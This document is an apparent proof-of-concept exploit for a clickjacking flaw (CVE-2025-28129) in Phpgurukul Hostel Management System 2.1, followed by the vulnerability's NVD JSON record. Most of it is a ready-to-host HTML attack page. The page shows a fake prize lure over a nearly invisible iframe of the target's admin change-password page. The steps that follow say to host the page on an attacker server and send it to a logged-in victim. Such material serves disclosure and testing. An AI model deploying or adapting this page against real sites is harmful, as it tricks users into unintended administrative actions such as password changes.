CVE-2025-28129

# CVE-2025-28129 - Phpgurukul Hostel Management System 2.1 Clickjacking PoC # This PoC demonstrates how to exploit the missing X-Frame-Options header # to embed the vulnerable application in a malicious iframe for clickjacking attacks. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Special Offer - Click to Claim!</title> <style> /* Style for the malicious page */ body { font-family: Arial, sans-serif; text-align: center; margin-top: 50px; background-color: #f0f0f0; } .bait { position: relative; z-index: 1; padding: 20px; background-color: #ff9900; color: white; font-size: 24px; font-weight: bold; border-radius: 10px; cursor: pointer; width: 300px; margin: 0 auto; } /* Transparent iframe overlaying the bait button */ iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; /* Nearly transparent */ z-index: 2; border: none; } /* Position the iframe to align with the bait button */ .iframe-container { position: relative; width: 340px; height: 80px; margin: 20px auto; } </style> </head> <body> <h1>Congratulations! You Won a Prize!</h1> <p>Click the button below to claim your reward:</p> <div class="iframe-container"> <!-- Bait element that the user thinks they are clicking --> <div class="bait">CLAIM YOUR PRIZE NOW!</div> <!-- Vulnerable target embedded in transparent iframe --> <!-- Replace with the actual URL of the target action page --> <iframe src="http://target-hostel-system.com/admin/change-password.php"></iframe> </div> <p>This is a demonstration of CVE-2025-28129 clickjacking vulnerability.</p> </body> </html> # Verification Steps: # 1. Deploy the vulnerable Phpgurukul Hostel Management System 2.1 # 2. Host this HTML file on an attacker-controlled web server # 3. Send the URL to a victim who is logged into the hostel management system # 4. When the victim clicks the "CLAIM YOUR PRIZE NOW!" button, # they are actually clicking through to the embedded hostel system page # 5. Check the HTTP response headers of the hostel system: # curl -I http://target-hostel-system.com/ # If X-Frame-Options or CSP frame-ancestors is missing, the site is vulnerable # Curl command to verify the vulnerability: # curl -I http://target-hostel-system.com/index.php # Look for absence of these headers: # X-Frame-Options: DENY # X-Frame-Options: SAMEORIGIN # Content-Security-Policy: frame-ancestors 'none' # Content-Security-Policy: frame-ancestors 'self'

{"cve": {"id": "CVE-2025-28129", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:51.067", "lastModified": "2025-10-21T18:40:55.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpgurukul Hostel Management System 2.1 is vulnerable to clickjacking."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:hostel_management_system:2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6BE856ED-F173-401B-A708-FCE7FAB85178"}]}]}], "references": [{"url": "https://github.com/NullMinds/CVE-Hunting/blob/main/Hostel%20Management%20System%20in%20PHP/Clickjacking.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}